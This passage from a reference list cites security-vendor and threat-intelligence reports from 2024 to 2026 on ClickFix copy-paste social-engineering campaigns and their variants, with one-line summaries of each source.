7. Recorded Future Insikt Group. (2026, March). ClickFix Campaigns Targeting Windows and macOS. Five-cluster activity analysis covering QuickBooks, Booking.com, Birdeye, dual-platform selection, and macOS storage cleaning clusters.
8. Center for Internet Security. (2025, October). ClickFix: An Adaptive Social Engineering Technique. Documented ClickFix as over a third of non-malware Albert Network alerts in H1 2025 against US SLTT victims, with August 2025 Interlock ransomware incident.
9. Huntress. (2026, January). Dissecting CrashFix: KongTuke's New Toy. Discovery of CrashFix variant, NexShield malicious extension, and ModeloRAT deployment targeting corporate environments.
10. Microsoft Security Blog. (2026, February). New ClickFix Variant "CrashFix" Deploying Python Remote Access Trojan. Microsoft confirmed CrashFix and described it as a "notable escalation in ClickFix tradecraft" combining browser disruption with social engineering. Documents finger.exe abuse for the staging command.
11. Microsoft Threat Intelligence. (2026, February). DNS-based ClickFix attack using nslookup for malware staging (initial disclosure via @msftsecurity). Replaces typical PowerShell download with nslookup command retrieving payload through DNS responses.
12. Microsoft Threat Intelligence. (2026, March). Windows Terminal (wt.exe) ClickFix campaign delivering Lumma Stealer via hex-encoded PowerShell commands and QueueUserAPC injection. Disclosed 6 March 2026.
13. Palo Alto Networks Unit 42. (2025). Fix the Click: Preventing the ClickFix Attack Vector. Unit 42 assisted in nearly a dozen IR cases with ClickFix as initial access. Documented IUAM ClickFix Generator phishing kit (active July-October 2025) blocking mobile traffic.
14. Elastic Security Labs. (2026, February). MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites. MIMICRAT campaign analysis via compromised bincheck[.]io site deploying previously undocumented RAT with ETW patching.
15. Atos. (2026, March). Investigating a New Click-Fix Variant. Documented WebDAV variant using net use to map attacker-controlled remote shares, evading Microsoft Defender for Endpoint.
16. Jamf Threat Labs. (2026, April). ClickFix Malware Uses macOS Script Editor to Deliver Atomic Stealer. Primary research documenting Script Editor variant using applescript:// URL scheme to bypass Terminal.
17. Malwarebytes. (2026, April). ClickFix finds a new way to infect Macs. Coverage of the Script Editor variant.
18. Bleeping Computer. (2026, February). QuickLens Chrome extension steals crypto, shows ClickFix attack. Compromised extension introduced ClickFix attacks and crypto wallet theft in version 5.8 update.
19. Bitdefender. (2025, December). ClickFix: A KISS from Cybercriminals. Analysis of EDR detection challenges, fileless execution patterns, and Lumma Stealer delivery through ClickFix.
20. Sekoia. (2025, March). Lazarus ClickFake Interview Campaign: From Contagious to ClickFix Malware Tactics. North Korean Lazarus Group campaign targeting cryptocurrency company applicants with GolangGhost backdoor.
21. Sekoia. (2024, October). ClickFix tactic: The Phantom Meet. Early documentation of ClickFix variants using fake video conferencing pages.
22. Trend Micro. (2026, March). Through the Lens of MDR: Analysis of KongTuke's ClickFix Abuse of Compromised WordPress Sites. KongTuke campaign delivering ModeloRAT through compromised WordPress sites and fake CAPTCHA lures.
23. MITRE ATT&CK. T1204.004 Malicious Copy and Paste. Sub-technique added to capture the ClickFix copy-paste pattern, with ClickFix named in the technique description.